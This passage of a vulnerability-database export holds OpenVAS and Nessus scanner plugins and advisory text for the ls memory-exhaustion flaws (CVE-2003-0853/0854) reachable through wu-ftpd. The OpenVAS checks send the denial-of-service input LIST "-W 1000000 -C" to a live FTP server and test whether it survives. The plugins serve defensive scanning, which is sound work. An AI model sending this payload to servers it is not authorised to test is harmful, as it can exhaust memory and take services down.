pass) pass = \"openvas@example.com\";\n\nsoc = open_sock_tcp(port);\nif (!soc) exit(0);\n\nif (! ftp_authenticate(socket:soc, user: user, pass: pass)) exit(0);\n\nport2 = ftp_pasv(socket:soc);\nif (!port2)\n{\n ftp_close(socket: soc);\n exit(0);\n}\n\nsoc2 = open_sock_tcp(port2, transport: ENCAPS_IP);\n\nif (!soc2 || safe_checks())\n{\n send(socket: soc, data: 'LIST -ABCDEFGHIJKLMNOPQRSTUV\\r\\n');\n r1 = ftp_recv_line(socket:soc);\n if (egrep(string: r1, pattern: \"invalid option|usage:\", icase: 1))\n security_message(port);\n if(soc2)close(soc2);\n ftp_close(socket: soc);\n exit(0);\n}\n \nstart_denial();\n\nsend(socket:soc, data: 'LIST \"-W 1000000 -C\"\\r\\n');\nr1 = ftp_recv_line(socket:soc);\nl = ftp_recv_listing(socket: soc2);\nr2 = ftp_recv_line(socket:soc);\nclose(soc2);\nftp_close(socket: soc);\n\nalive = end_denial();\nif (! alive)\n{\n security_message(port);\n exit(0);\n}\n\nif (egrep(string: r2, pattern: \"exhausted|failed\", icase: 1))\n{\n security_message(port);\n exit(0);\n}\n\nsoc = open_sock_tcp(port);\nif (! soc || ! 
ftp_authenticate(socket:soc, user: user, pass: pass))\n security_message(port);\nif (soc) ftp_close(socket: soc);\n\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-11-06T12:02:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0853", "CVE-2003-0854"], "description": "The FTP server does not filter arguments to the ls command.", "modified": "2019-10-29T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231011912", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231011912", "type": "openvas", "title": "wu-ftpd ls -W memory exhaustion", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# wu-ftpd ls -W memory exhaustion\n#\n# Authors:\n# Michel Arboi <arboi@alussinan.org>\n# HD Moore suggested fixes and the safe_checks code.\n#\n# Copyright:\n# Copyright (C) 2003 Michel Arboi\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:washington_university:wu-ftpd\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.11912\");\n script_version(\"2019-10-29T09:45:45+0000\");\n script_tag(name:\"last_modification\", value:\"2019-10-29 09:45:45 +0000 (Tue, 29 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(8875);\n script_cve_id(\"CVE-2003-0853\", \"CVE-2003-0854\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"wu-ftpd ls -W memory exhaustion\");\n script_category(ACT_DENIAL);\n script_family(\"FTP\");\n script_copyright(\"Copyright (C) 2003 Michel Arboi\");\n script_dependencies(\"gb_wu-ftpd_detect.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n script_mandatory_keys(\"wu-ftpd/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.guninski.com/binls.html\");\n script_xref(name:\"CONECTIVA\", value:\"CLA-2003:768\");\n script_xref(name:\"zone-h\", value:\"3299\");\n\n script_tag(name:\"summary\", value:\"The FTP server does not filter arguments to the ls command.\");\n\n script_tag(name:\"insight\", value:\"It is possible to consume all available memory on the machine\n by sending\n\n ls '-w 1000000 -C'\");\n\n script_tag(name:\"solution\", value:\"Contact your vendor for a fix.\");\n\n script_tag(name:\"qod_type\", value:\"remote_probe\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"ftp_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! 
get_app_location( cpe:CPE, port:port ) ) exit( 0 );\n\nkb_creds = ftp_get_kb_creds();\nuser = kb_creds[\"login\"];\npass = kb_creds[\"pass\"];\n\nsoc = open_sock_tcp( port );\nif( ! soc ) exit( 0 );\nif( ! ftp_authenticate( socket:soc, user:user, pass:pass ) ) exit( 0 );\n\nport2 = ftp_pasv( socket:soc );\nif( ! port2 ) {\n ftp_close( socket:soc );\n exit( 0 );\n}\n\nsoc2 = open_sock_tcp( port2, transport:ENCAPS_IP );\n\nif( ! soc2 ) {\n send( socket:soc, data:'LIST -ABCDEFGHIJKLMNOPQRSTUV\\r\\n' );\n r1 = ftp_recv_line( socket:soc );\n\n if( egrep( string:r1, pattern:\"invalid option|usage:\", icase:TRUE ) )\n security_message( port:port );\n\n if( soc2 ) close( soc2 );\n ftp_close( socket:soc );\n exit( 0 );\n}\n\nif( safe_checks() ) exit( 0 );\n\nstart_denial();\n\nsend( socket:soc, data:'LIST \"-W 1000000 -C\"\\r\\n' );\nr1 = ftp_recv_line( socket:soc );\nl = ftp_recv_listing( socket:soc2 );\nr2 = ftp_recv_line( socket:soc );\nclose( soc2 );\nftp_close( socket:soc );\n\nalive = end_denial();\nif( ! alive ) {\n security_message( port:port );\n exit( 0 );\n}\n\nif( egrep( string:r2, pattern:\"exhausted|failed\", icase:TRUE ) ) {\n security_message( port:port );\n exit( 0 );\n}\n\nsoc = open_sock_tcp( port );\nif( ! soc || ! 
ftp_authenticate( socket:soc, user:user, pass:pass ) )\n security_message( port:port );\n\nif( soc ) ftp_close( socket:soc );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-24T12:50:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0256", "CVE-2003-0854"], "description": "The remote host is missing an update to wu-ftpd\nannounced via advisory DSA 705-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53532", "href": "http://plugins.openvas.org/nasl.php?oid=53532", "type": "openvas", "title": "Debian Security Advisory DSA 705-1 (wu-ftpd)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_705_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 705-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several denial of service conditions have been discovered in wu-ftpd,\nthe popular FTP daemon. 
The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2005-0256\n\nAdam Zabrocki discovered a denial of service condition in wu-ftpd\nthat could be exploited by a remote user and cause the server to\nslow down the server by resource exhaustion.\n\nCVE-2003-0854\n\nGeorgi Guninski discovered that /bin/ls may be called from within\nwu-ftpd in a way that will result in large memory consumption and\nhence slow down the server.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 2.6.2-3woody5.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 2.6.2-19.\n\nWe recommend that you upgrade your wu-ftpd package.\";\ntag_summary = \"The remote host is missing an update to wu-ftpd\nannounced via advisory DSA 705-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20705-1\";\n\nif(description)\n{\n script_id(53532);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:00:53 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2005-0256\", \"CVE-2003-0854\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Debian Security Advisory DSA 705-1 (wu-ftpd)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"wu-ftpd-academ\", ver:\"2.6.2-3woody5\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wu-ftpd\", ver:\"2.6.2-3woody5\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-07T11:51:20", "description": "A memory starvation denial of service vulnerability in the ls program\nwas discovered by Georgi Guninski. It is possible to allocate a huge\namount of memory by specifying certain command-line arguments. It is\nalso possible to exploit this remotely via programs that call ls such\nas wu-ftpd (although wu-ftpd is no longer shipped with Mandrake\nLinux).\n\nLikewise, a non-exploitable integer overflow problem was discovered in\nls, which can be used to crash ls by specifying certain command-line\narguments. 
This can also be triggered via remotely accessible services\nsuch as wu-ftpd.\n\nThe provided packages include a patched ls to fix these problems.", "edition": 24, "published": "2004-07-31T00:00:00", "title": "Mandrake Linux Security Advisory : fileutils/coreutils (MDKSA-2003:106)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0853", "CVE-2003-0854"], "modified": "2004-07-31T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:fileutils", "cpe:/o:mandrakesoft:mandrake_linux:9.1", "cpe:/o:mandrakesoft:mandrake_linux:9.2", "p-cpe:/a:mandriva:linux:coreutils", "cpe:/o:mandrakesoft:mandrake_linux:9.0", "p-cpe:/a:mandriva:linux:coreutils-doc"], "id": "MANDRAKE_MDKSA-2003-106.NASL", "href": "https://www.tenable.com/plugins/nessus/14088", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2003:106. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14088);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2003-0853\", \"CVE-2003-0854\");\n script_xref(name:\"MDKSA\", value:\"2003:106\");\n\n script_name(english:\"Mandrake Linux Security Advisory : fileutils/coreutils (MDKSA-2003:106)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A memory starvation denial of service vulnerability in the ls program\nwas discovered by Georgi Guninski. It is possible to allocate a huge\namount of memory by specifying certain command-line arguments. 
It is\nalso possible to exploit this remotely via programs that call ls such\nas wu-ftpd (although wu-ftpd is no longer shipped with Mandrake\nLinux).\n\nLikewise, a non-exploitable integer overflow problem was discovered in\nls, which can be used to crash ls by specifying certain command-line\narguments. This can also be triggered via remotely accessible services\nsuch as wu-ftpd.\n\nThe provided packages include a patched ls to fix these problems.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected coreutils, coreutils-doc and / or fileutils\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:coreutils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:coreutils-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:fileutils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/11/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif 
(!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"fileutils-4.1.11-6.1.90mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"coreutils-4.5.7-1.1.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"coreutils-doc-4.5.7-1.1.91mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.2\", cpu:\"amd64\", reference:\"coreutils-5.0-7.1.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"i386\", reference:\"coreutils-5.0-6.1.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"amd64\", reference:\"coreutils-doc-5.0-7.1.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"i386\", reference:\"coreutils-doc-5.0-6.1.92mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T13:05:17", "description": "Updated fileutils packages that close a potential denial of service\nvulnerability are now available.\n\nThe fileutils package contains several basic system utilities. One of\nthese utilities is the 'ls' program, which is used to list information\nabout files and directories.\n\nGeorgi Guninski discovered a memory starvation denial of service\nvulnerability in the ls program. 
It is possible to make ls allocate a\nhuge amount of memory by specifying certain command line arguments.\nThis vulnerability is remotely exploitable through services like\nwu-ftpd, which pass user arguments to ls. The Common Vulnerabilities\nand Exposures project (cve.mitre.org) has assigned the name\nCVE-2003-0854 to this issue.\n\nA non-exploitable integer overflow in ls has been discovered. It is\npossible to make ls crash by specifying certain command line\narguments. This vulnerability is remotely exploitable through services\nlike wu-ftpd, which pass user arguments to ls. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the\nname CVE-2003-0853 to this issue.\n\nUsers are advised to update to these erratum packages, which contain\nbackported security patches that correct these vulnerabilities.\n\nThese packages also add support for the O_DIRECT flag, which controls\nthe use of synchronous I/O on file systems such as OCFS.", "edition": 28, "published": "2004-07-06T00:00:00", "title": "RHEL 2.1 : fileutils (RHSA-2003:310)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0853", "CVE-2003-0854"], "modified": "2004-07-06T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:2.1", "p-cpe:/a:redhat:enterprise_linux:fileutils"], "id": "REDHAT-RHSA-2003-310.NASL", "href": "https://www.tenable.com/plugins/nessus/12428", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2003:310. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(12428);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2003-0853\", \"CVE-2003-0854\");\n script_xref(name:\"RHSA\", value:\"2003:310\");\n\n script_name(english:\"RHEL 2.1 : fileutils (RHSA-2003:310)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated fileutils packages that close a potential denial of service\nvulnerability are now available.\n\nThe fileutils package contains several basic system utilities. One of\nthese utilities is the 'ls' program, which is used to list information\nabout files and directories.\n\nGeorgi Guninski discovered a memory starvation denial of service\nvulnerability in the ls program. It is possible to make ls allocate a\nhuge amount of memory by specifying certain command line arguments.\nThis vulnerability is remotely exploitable through services like\nwu-ftpd, which pass user arguments to ls. The Common Vulnerabilities\nand Exposures project (cve.mitre.org) has assigned the name\nCVE-2003-0854 to this issue.\n\nA non-exploitable integer overflow in ls has been discovered. It is\npossible to make ls crash by specifying certain command line\narguments. This vulnerability is remotely exploitable through services\nlike wu-ftpd, which pass user arguments to ls. 
The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the\nname CVE-2003-0853 to this issue.\n\nUsers are advised to update to these erratum packages, which contain\nbackported security patches that correct these vulnerabilities.\n\nThese packages also add support for the O_DIRECT flag, which controls\nthe use of synchronous I/O on file systems such as OCFS.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2003-0853\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2003-0854\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2003:310\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected fileutils package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:fileutils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/11/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/11/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^2\\.1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2003:310\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"fileutils-4.1-10.4\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + 
redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"fileutils\");\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-12T10:05:41", "description": "An updated coreutils package is available fixing an issue in the ls(1)\nutility, described at :\n\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0853\n\nNote that this vulnerability affects Internet-facing services which\nexecute ls(1) with user-supplied input, and although wu-ftpd is one\nsuch service it is not supplied with Fedora Core 1.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2012-09-24T00:00:00", "title": "Fedora Core 1 : coreutils-5.0-34.1 (2004-091)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0853"], "modified": "2012-09-24T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:coreutils-debuginfo", "cpe:/o:fedoraproject:fedora_core:1", "p-cpe:/a:fedoraproject:fedora:coreutils"], "id": "FEDORA_2004-091.NASL", "href": "https://www.tenable.com/plugins/nessus/62243", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2004-091.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(62243);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2003-0853\");\n script_xref(name:\"FEDORA\", value:\"2004-091\");\n\n script_name(english:\"Fedora Core 1 : coreutils-5.0-34.1 (2004-091)\");\n 
script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated coreutils package is available fixing an issue in the ls(1)\nutility, described at :\n\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0853\n\nNote that this vulnerability affects Internet-facing services which\nexecute ls(1) with user-supplied input, and although wu-ftpd is one\nsuch service it is not supplied with Fedora Core 1.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2004-March/000089.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7ad7dd42\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected coreutils and / or coreutils-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:coreutils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:coreutils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local 
Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 1.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC1\", reference:\"coreutils-5.0-34.1\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"coreutils-debuginfo-5.0-34.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"coreutils / coreutils-debuginfo\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-06T10:03:18", "description": "Several denial of service conditions have been discovered in wu-ftpd,\nthe popular FTP daemon. 
